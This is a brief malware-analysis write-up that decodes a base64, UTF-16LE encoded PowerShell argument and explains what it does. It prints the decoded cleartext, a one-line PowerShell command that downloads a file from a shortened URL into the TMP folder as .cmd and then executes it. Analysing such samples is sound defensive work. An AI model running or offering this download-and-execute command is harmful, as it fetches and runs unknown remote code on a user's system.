Powershell – Malware Analysis
Given the powershell argument. The payload is encoded with base64 and utf-16 le Now we have the cleartext – iwr is.gd/jwr7JD -o $env:TMP/.cmd;& $env:TMP/.cmd A file will be downloaded and saved with the ending .cmd in the folder TMP.